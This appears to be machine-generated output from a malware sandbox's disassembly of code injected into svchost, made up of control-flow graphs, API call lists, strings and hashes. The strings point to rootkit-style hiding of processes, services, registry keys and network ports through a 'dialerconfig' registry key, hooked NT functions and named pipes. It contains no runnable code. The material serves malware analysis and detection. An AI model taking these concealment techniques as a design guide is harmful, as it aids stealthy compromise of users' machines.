                                                                                                                              • Part of subcall function 0000023C9FD91628: HeapAlloc.KERNEL32 ref: 0000023C9FD91642
                                                                                                                              • Part of subcall function 0000023C9FD91628: RegOpenKeyExW.ADVAPI32 ref: 0000023C9FD916B2
                                                                                                                              • Part of subcall function 0000023C9FD91628: RegOpenKeyExW.ADVAPI32 ref: 0000023C9FD916DF
                                                                                                                              • Part of subcall function 0000023C9FD91628: RegCloseKey.ADVAPI32 ref: 0000023C9FD916F9
                                                                                                                              • Part of subcall function 0000023C9FD91628: RegOpenKeyExW.ADVAPI32 ref: 0000023C9FD91719
                                                                                                                              • Part of subcall function 0000023C9FD91628: RegCloseKey.ADVAPI32 ref: 0000023C9FD91734
                                                                                                                              • Part of subcall function 0000023C9FD91628: RegOpenKeyExW.ADVAPI32 ref: 0000023C9FD91754
                                                                                                                              • Part of subcall function 0000023C9FD91628: RegCloseKey.ADVAPI32 ref: 0000023C9FD9176F
                                                                                                                              • Part of subcall function 0000023C9FD91628: RegOpenKeyExW.ADVAPI32 ref: 0000023C9FD9178F
                                                                                                                              • Part of subcall function 0000023C9FD91628: RegCloseKey.ADVAPI32 ref: 0000023C9FD917AA
                                                                                                                              • Part of subcall function 0000023C9FD91628: RegOpenKeyExW.ADVAPI32 ref: 0000023C9FD917CA
                                                                                                                            • Sleep.KERNEL32 ref: 0000023C9FD91AD7
                                                                                                                            • SleepEx.KERNELBASE ref: 0000023C9FD91ADD
                                                                                                                              • Part of subcall function 0000023C9FD91628: RegCloseKey.ADVAPI32 ref: 0000023C9FD917E5
                                                                                                                              • Part of subcall function 0000023C9FD91628: RegOpenKeyExW.ADVAPI32 ref: 0000023C9FD91805
                                                                                                                              • Part of subcall function 0000023C9FD91628: RegCloseKey.ADVAPI32 ref: 0000023C9FD91820
                                                                                                                              • Part of subcall function 0000023C9FD91628: RegOpenKeyExW.ADVAPI32 ref: 0000023C9FD91840
                                                                                                                              • Part of subcall function 0000023C9FD91628: RegCloseKey.ADVAPI32 ref: 0000023C9FD9185B
                                                                                                                              • Part of subcall function 0000023C9FD91628: RegOpenKeyExW.ADVAPI32 ref: 0000023C9FD9187B
                                                                                                                              • Part of subcall function 0000023C9FD91628: RegCloseKey.ADVAPI32 ref: 0000023C9FD91896
                                                                                                                              • Part of subcall function 0000023C9FD91628: RegCloseKey.ADVAPI32 ref: 0000023C9FD918A0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1534210851-0
                                                                                                                            • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                                                                            • Instruction ID: e86c9777ab782df55b82f34e4b551db4e7b06d2da40f16e4b0d0133f8a38cfbe
                                                                                                                            • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                                                                            • Instruction Fuzzy Hash: A831236320274141FF519F66D6493B913A5AB45BCBF266421CE09A72D5FF1CCAD1C310

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 89 23c9fd93844-23c9fd9384f 90 23c9fd93869-23c9fd93870 89->90 91 23c9fd93851-23c9fd93864 StrCmpNIW 89->91 91->90 92 23c9fd93866 91->92 92->90
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: dialer
                                                                                                                            • API String ID: 0-3528709123
                                                                                                                            • Opcode ID: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                                                                                            • Instruction ID: b64d195b827d9c602696f12b174718a7dbec88416db533b65e07794dea540fe7
                                                                                                                            • Opcode Fuzzy Hash: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                                                                                            • Instruction Fuzzy Hash: E9D05E623127058AFB149FE688CC7742355AB18B4AFD94020C90011150DB5DCADE9710

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 93 23c9fd6273c-23c9fd627a4 call 23c9fd629d4 * 4 102 23c9fd629b2 93->102 103 23c9fd627aa-23c9fd627ad 93->103 104 23c9fd629b4-23c9fd629d0 102->104 103->102 105 23c9fd627b3-23c9fd627b6 103->105 105->102 106 23c9fd627bc-23c9fd627bf 105->106 106->102 107 23c9fd627c5-23c9fd627e6 106->107 107->102 109 23c9fd627ec-23c9fd6280c 107->109 110 23c9fd6280e-23c9fd62836 109->110 111 23c9fd62838-23c9fd6283f 109->111 110->110 110->111 112 23c9fd628df-23c9fd628e6 111->112 113 23c9fd62845-23c9fd62852 111->113 115 23c9fd62992-23c9fd629b0 112->115 116 23c9fd628ec-23c9fd62901 112->116 113->112 114 23c9fd62858-23c9fd6286a LoadLibraryA 113->114 118 23c9fd6286c-23c9fd62878 114->118 119 23c9fd628ca-23c9fd628d2 114->119 115->104 116->115 117 23c9fd62907 116->117 120 23c9fd6290d-23c9fd62921 117->120 121 23c9fd628c5-23c9fd628c8 118->121 119->114 122 23c9fd628d4-23c9fd628d9 119->122 124 23c9fd62982-23c9fd6298c 120->124 125 23c9fd62923-23c9fd62934 120->125 121->119 126 23c9fd6287a-23c9fd6287d 121->126 122->112 124->115 124->120 128 23c9fd6293f-23c9fd62943 125->128 129 23c9fd62936-23c9fd6293d 125->129 130 23c9fd6287f-23c9fd628a5 126->130 131 23c9fd628a7-23c9fd628b7 126->131 133 23c9fd6294d-23c9fd62951 128->133 134 23c9fd62945-23c9fd6294b 128->134 132 23c9fd62970-23c9fd62980 129->132 135 23c9fd628ba-23c9fd628c1 130->135 131->135 132->124 132->125 136 23c9fd62963-23c9fd62967 133->136 137 23c9fd62953-23c9fd62961 133->137 134->132 135->121 136->132 139 23c9fd62969-23c9fd6296c 136->139 137->132 139->132
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000032.00000002.3320486003.0000023C9FD60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_50_2_23c9fd60000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: LibraryLoad
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1029625771-0
                                                                                                                            • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                                                            • Instruction ID: 3a619fa86ca54a05c4de5bba6d8deee738dfcef4faeac7959e32349048c00175
                                                                                                                            • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                                                            • Instruction Fuzzy Hash: 4161F233B0179087DF54CF15980873DB3A2FB95BA6F698126DE5927B88DA3CD952C700

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 399 23c9fd92b2c-23c9fd92ba5 call 23c9fdb2ce0 402 23c9fd92bab-23c9fd92bb1 399->402 403 23c9fd92ee0-23c9fd92f03 399->403 402->403 404 23c9fd92bb7-23c9fd92bba 402->404 404->403 405 23c9fd92bc0-23c9fd92bc3 404->405 405->403 406 23c9fd92bc9-23c9fd92bd9 GetModuleHandleA 405->406 407 23c9fd92bdb-23c9fd92beb call 23c9fda6090 406->407 408 23c9fd92bed 406->408 410 23c9fd92bf0-23c9fd92c0e 407->410 408->410 410->403 413 23c9fd92c14-23c9fd92c33 StrCmpNIW 410->413 413->403 414 23c9fd92c39-23c9fd92c3d 413->414 414->403 415 23c9fd92c43-23c9fd92c4d 414->415 415->403 416 23c9fd92c53-23c9fd92c5a 415->416 416->403 417 23c9fd92c60-23c9fd92c73 416->417 418 23c9fd92c75-23c9fd92c81 417->418 419 23c9fd92c83 417->419 420 23c9fd92c86-23c9fd92c8a 418->420 419->420 421 23c9fd92c9a 420->421 422 23c9fd92c8c-23c9fd92c98 420->422 423 23c9fd92c9d-23c9fd92ca7 421->423 422->423 424 23c9fd92d9d-23c9fd92da1 423->424 425 23c9fd92cad-23c9fd92cb0 423->425 428 23c9fd92da7-23c9fd92daa 424->428 429 23c9fd92ed2-23c9fd92eda 424->429 426 23c9fd92cc2-23c9fd92ccc 425->426 427 23c9fd92cb2-23c9fd92cbf call 23c9fd9199c 425->427 433 23c9fd92cce-23c9fd92cdb 426->433 434 23c9fd92d00-23c9fd92d0a 426->434 427->426 430 23c9fd92dbb-23c9fd92dc5 428->430 431 23c9fd92dac-23c9fd92db8 call 23c9fd9199c 428->431 429->403 429->417 436 23c9fd92df5-23c9fd92df8 430->436 437 23c9fd92dc7-23c9fd92dd4 430->437 431->430 433->434 439 23c9fd92cdd-23c9fd92cea 433->439 440 23c9fd92d3a-23c9fd92d3d 434->440 441 23c9fd92d0c-23c9fd92d19 434->441 446 23c9fd92e05-23c9fd92e12 lstrlenW 436->446 447 23c9fd92dfa-23c9fd92e03 call 23c9fd91bbc 436->447 437->436 445 23c9fd92dd6-23c9fd92de3 437->445 448 23c9fd92ced-23c9fd92cf3 439->448 443 23c9fd92d4b-23c9fd92d58 lstrlenW 440->443 444 23c9fd92d3f-23c9fd92d49 call 23c9fd91bbc 440->444 441->440 449 23c9fd92d1b-23c9fd92d28 441->449 451 23c9fd92d7b-23c9fd92d8d call 23c9fd93844 443->451 452 23c9fd92d5a-23c9fd92d64 443->452 444->443 456 23c9fd92d93-23c9fd92d98 444->456 453 23c9fd92de6-23c9fd92dec 445->453 457 23c9fd92e35-23c9fd92e3f call 23c9fd93844 446->457 458 23c9fd92e14-23c9fd92e1e 446->458 447->446 464 23c9fd92e4a-23c9fd92e55 447->464 455 23c9fd92cf9-23c9fd92cfe 448->455 448->456 459 23c9fd92d2b-23c9fd92d31 449->459 451->456 468 23c9fd92e42-23c9fd92e44 451->468 452->451 463 23c9fd92d66-23c9fd92d79 call 23c9fd9152c 452->463 453->464 465 23c9fd92dee-23c9fd92df3 453->465 455->434 455->448 456->468 457->468 458->457 469 23c9fd92e20-23c9fd92e33 call 23c9fd9152c 458->469 459->456 460 23c9fd92d33-23c9fd92d38 459->460 460->440 460->459 463->451 463->456 471 23c9fd92e57-23c9fd92e5b 464->471 472 23c9fd92ecc-23c9fd92ed0 464->472 465->436 465->453 468->429 468->464 469->457 469->464 477 23c9fd92e5d-23c9fd92e61 471->477 478 23c9fd92e63-23c9fd92e7d call 23c9fd985c0 471->478 472->429 477->478 480 23c9fd92e80-23c9fd92e83 477->480 478->480 483 23c9fd92e85-23c9fd92ea3 call 23c9fd985c0 480->483 484 23c9fd92ea6-23c9fd92ea9 480->484 483->484 484->472 485 23c9fd92eab-23c9fd92ec9 call 23c9fd985c0 484->485 485->472
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                                                                            • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                                                            • API String ID: 2119608203-3850299575
                                                                                                                            • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                                                                            • Instruction ID: c7ee9107203d44bdf36ae34525c02def78a0d96f8ae86e0cdae0ec7bb850561a
                                                                                                                            • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                                                                            • Instruction Fuzzy Hash: A4B1C323212B5082EB59DFA5D4487B963A4FB46B97F66501AEE0963794DF3DCEC0C340
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3140674995-0
                                                                                                                            • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                                                                            • Instruction ID: b66be5f753f9a1e6a56771ef2465323605b3be2834fbd8b588db6c5ca349ed3b
                                                                                                                            • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                                                                            • Instruction Fuzzy Hash: 6A313E73205B80CAEB609F60E8447ED7364F784749F55442ADA5E67B98EF3CC648C714
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1239891234-0
                                                                                                                            • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                                                                            • Instruction ID: f9ba92a2141ec3dc68b3688644f0a3304593a1e55a1c8035841cfe0f429b0bd5
                                                                                                                            • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                                                                            • Instruction Fuzzy Hash: 3F317133215F8086DB60DF65E8443AE73A0F789B5AF650225EA9D53B98DF3CC695CB00

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                                                            • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                                                            • API String ID: 106492572-2879589442
                                                                                                                            • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                                                                            • Instruction ID: 00ff3e7dc70780f66e364e3fffae47cb081e8ce491ffe87b295e596850d53c96
                                                                                                                            • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                                                                            • Instruction Fuzzy Hash: F0711827311B11C6EB109F65E8987A923A4FB84F8EF121111DE4E67B69EF3CC694D348

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentThread$AddressHandleModuleProc
                                                                                                                            • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                                                                            • API String ID: 4175298099-1975688563
                                                                                                                            • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                                                                            • Instruction ID: 32e0c514c15e67092b4d8cf3e36448ca5e605fb48b53fd217be05a92b649f763
                                                                                                                            • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                                                                            • Instruction Fuzzy Hash: 6931816B202B4AA0EB06EFA5E85D7F86320B745747FE25623D419325759F3CC38AC394

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • GetLastError.KERNEL32 ref: 0000023C9FD9CE37
                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,0000023C9FDA0A6B,?,?,?,0000023C9FDA045C,?,?,?,0000023C9FD9C84F), ref: 0000023C9FD9CE4C
                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,0000023C9FDA0A6B,?,?,?,0000023C9FDA045C,?,?,?,0000023C9FD9C84F), ref: 0000023C9FD9CE6D
                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,0000023C9FDA0A6B,?,?,?,0000023C9FDA045C,?,?,?,0000023C9FD9C84F), ref: 0000023C9FD9CE9A
                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,0000023C9FDA0A6B,?,?,?,0000023C9FDA045C,?,?,?,0000023C9FD9C84F), ref: 0000023C9FD9CEAB
                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,0000023C9FDA0A6B,?,?,?,0000023C9FDA045C,?,?,?,0000023C9FD9C84F), ref: 0000023C9FD9CEBC
                                                                                                                            • SetLastError.KERNEL32 ref: 0000023C9FD9CED7
                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,0000023C9FDA0A6B,?,?,?,0000023C9FDA045C,?,?,?,0000023C9FD9C84F), ref: 0000023C9FD9CF0D
                                                                                                                            • FlsSetValue.KERNEL32(?,?,00000001,0000023C9FD9ECCC,?,?,?,?,0000023C9FD9BF9F,?,?,?,?,?,0000023C9FD97AB0), ref: 0000023C9FD9CF2C
                                                                                                                              • Part of subcall function 0000023C9FD9D6CC: HeapAlloc.KERNEL32 ref: 0000023C9FD9D721
                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000023C9FDA0A6B,?,?,?,0000023C9FDA045C,?,?,?,0000023C9FD9C84F), ref: 0000023C9FD9CF54
                                                                                                                              • Part of subcall function 0000023C9FD9D744: HeapFree.KERNEL32 ref: 0000023C9FD9D75A
                                                                                                                              • Part of subcall function 0000023C9FD9D744: GetLastError.KERNEL32 ref: 0000023C9FD9D764
                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000023C9FDA0A6B,?,?,?,0000023C9FDA045C,?,?,?,0000023C9FD9C84F), ref: 0000023C9FD9CF65
                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000023C9FDA0A6B,?,?,?,0000023C9FDA045C,?,?,?,0000023C9FD9C84F), ref: 0000023C9FD9CF76
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Value$ErrorLast$Heap$AllocFree
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 570795689-0
                                                                                                                            • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                                                                            • Instruction ID: 72943e90d7e32eff41b8364ecc90685daeceec26b5f1b16d2aadd79b0beb58a0
                                                                                                                            • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                                                                            • Instruction Fuzzy Hash: E3418F2330374542FA69AFB1955E37922829B857B7F3A0724E937376E6DE2C87C19300

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                                                                            • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                                                                            • API String ID: 2171963597-1373409510
                                                                                                                            • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                                                                            • Instruction ID: 3c1ec7224b6520f0259cbb9759a1b88848df04e4d64bf2f9d1463577e4702a20
                                                                                                                            • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                                                                            • Instruction Fuzzy Hash: 75212C37614B40C2FB149F25F44C36A77A1F789BAAF614215EA5913BA8DF7CC289CB04

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 620 23c9fd9a544-23c9fd9a5ac call 23c9fd9b414 623 23c9fd9aa13-23c9fd9aa1b call 23c9fd9c748 620->623 624 23c9fd9a5b2-23c9fd9a5b5 620->624 624->623 625 23c9fd9a5bb-23c9fd9a5c1 624->625 628 23c9fd9a5c7-23c9fd9a5cb 625->628 629 23c9fd9a690-23c9fd9a6a2 625->629 628->629 632 23c9fd9a5d1-23c9fd9a5dc 628->632 630 23c9fd9a6a8-23c9fd9a6ac 629->630 631 23c9fd9a963-23c9fd9a967 629->631 630->631 635 23c9fd9a6b2-23c9fd9a6bd 630->635 633 23c9fd9a969-23c9fd9a970 631->633 634 23c9fd9a9a0-23c9fd9a9aa call 23c9fd99634 631->634 632->629 636 23c9fd9a5e2-23c9fd9a5e7 632->636 633->623 638 23c9fd9a976-23c9fd9a99b call 23c9fd9aa1c 633->638 634->623 648 23c9fd9a9ac-23c9fd9a9cb call 23c9fd97940 634->648 635->631 640 23c9fd9a6c3-23c9fd9a6ca 635->640 636->629 637 23c9fd9a5ed-23c9fd9a5f7 call 23c9fd99634 636->637 637->648 651 23c9fd9a5fd-23c9fd9a628 call 23c9fd99634 * 2 call 23c9fd99d24 637->651 638->634 641 23c9fd9a894-23c9fd9a8a0 640->641 642 23c9fd9a6d0-23c9fd9a707 call 23c9fd99a10 640->642 641->634 649 23c9fd9a8a6-23c9fd9a8aa 641->649 642->641 656 23c9fd9a70d-23c9fd9a715 642->656 653 23c9fd9a8ba-23c9fd9a8c2 649->653 654 23c9fd9a8ac-23c9fd9a8b8 call 23c9fd99ce4 649->654 688 23c9fd9a648-23c9fd9a652 call 23c9fd99634 651->688 689 23c9fd9a62a-23c9fd9a62e 651->689 653->634 655 23c9fd9a8c8-23c9fd9a8d5 call 23c9fd998b4 653->655 654->653 664 23c9fd9a8db-23c9fd9a8e3 654->664 655->634 655->664 662 23c9fd9a719-23c9fd9a74b 656->662 666 23c9fd9a887-23c9fd9a88e 662->666 667 23c9fd9a751-23c9fd9a75c 662->667 669 23c9fd9a9f6-23c9fd9aa12 call 23c9fd99634 * 2 call 23c9fd9c6a8 664->669 670 23c9fd9a8e9-23c9fd9a8ed 664->670 666->641 666->662 667->666 671 23c9fd9a762-23c9fd9a77b 667->671 669->623 673 23c9fd9a8ef-23c9fd9a8fe call 23c9fd99ce4 670->673 674 23c9fd9a900 670->674 675 23c9fd9a874-23c9fd9a879 671->675 676 23c9fd9a781-23c9fd9a7c6 call 23c9fd99cf8 * 2 671->676 684 23c9fd9a903-23c9fd9a90d call 23c9fd9b4ac 673->684 674->684 680 23c9fd9a884 675->680 702 23c9fd9a804-23c9fd9a80a 676->702 703 23c9fd9a7c8-23c9fd9a7ee call 23c9fd99cf8 call 23c9fd9ac38 676->703 680->666 684->634 699 23c9fd9a913-23c9fd9a961 call 23c9fd99944 call 23c9fd99b50 684->699 688->629 701 23c9fd9a654-23c9fd9a674 call 23c9fd99634 * 2 call 23c9fd9b4ac 688->701 689->688 693 23c9fd9a630-23c9fd9a63b 689->693 693->688 698 23c9fd9a63d-23c9fd9a642 693->698 698->623 698->688 699->634 726 23c9fd9a676-23c9fd9a680 call 23c9fd9b59c 701->726 727 23c9fd9a68b 701->727 708 23c9fd9a87b 702->708 709 23c9fd9a80c-23c9fd9a810 702->709 720 23c9fd9a815-23c9fd9a872 call 23c9fd9a470 703->720 721 23c9fd9a7f0-23c9fd9a802 703->721 713 23c9fd9a880 708->713 709->676 713->680 720->713 721->702 721->703 730 23c9fd9a686-23c9fd9a9ef call 23c9fd992ac call 23c9fd9aff4 call 23c9fd994a0 726->730 731 23c9fd9a9f0-23c9fd9a9f5 call 23c9fd9c6a8 726->731 727->629 730->731 731->669
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                            • String ID: csm$csm$csm
                                                                                                                            • API String ID: 849930591-393685449
                                                                                                                            • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                                                                            • Instruction ID: 0e1c3c77f64e8f4aa83c67f0269d300be4ae649b87345167c74bed53c09d7bb8
                                                                                                                            • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                                                                            • Instruction Fuzzy Hash: 3CE1B277602B408AFB20DFA5D4883AD77A0F745BA9F620115EE8967B99CB3CC6C1C701
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressFreeLibraryProc
                                                                                                                            • String ID: api-ms-$ext-ms-
                                                                                                                            • API String ID: 3013587201-537541572
                                                                                                                            • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                                                                            • Instruction ID: dc8ad38878208d8ca577ebbaeebc6c7377358e1fa9398032812038abc6e92bc4
                                                                                                                            • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                                                                            • Instruction Fuzzy Hash: C741C423322F0091FB16CFA6A80C7752391F745BE6F2A4125DD1DAB784EE3CC6859344
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                                                            • String ID: d
                                                                                                                            • API String ID: 3743429067-2564639436
                                                                                                                            • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                                                            • Instruction ID: bf4d5e9b72a927c354924b6789bf90666660a3f57e477406bce86737f63aeb7b
                                                                                                                            • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                                                            • Instruction Fuzzy Hash: 4D417133214B84D6E760CF61E4487AE77A1F388B99F558129DB8927B58DF3CC589CB40
                                                                                                                            APIs
                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,0000023C9FD9C7DE,?,?,?,?,?,?,?,?,0000023C9FD9CF9D,?,?,00000001), ref: 0000023C9FD9D087
                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,0000023C9FD9C7DE,?,?,?,?,?,?,?,?,0000023C9FD9CF9D,?,?,00000001), ref: 0000023C9FD9D0A6
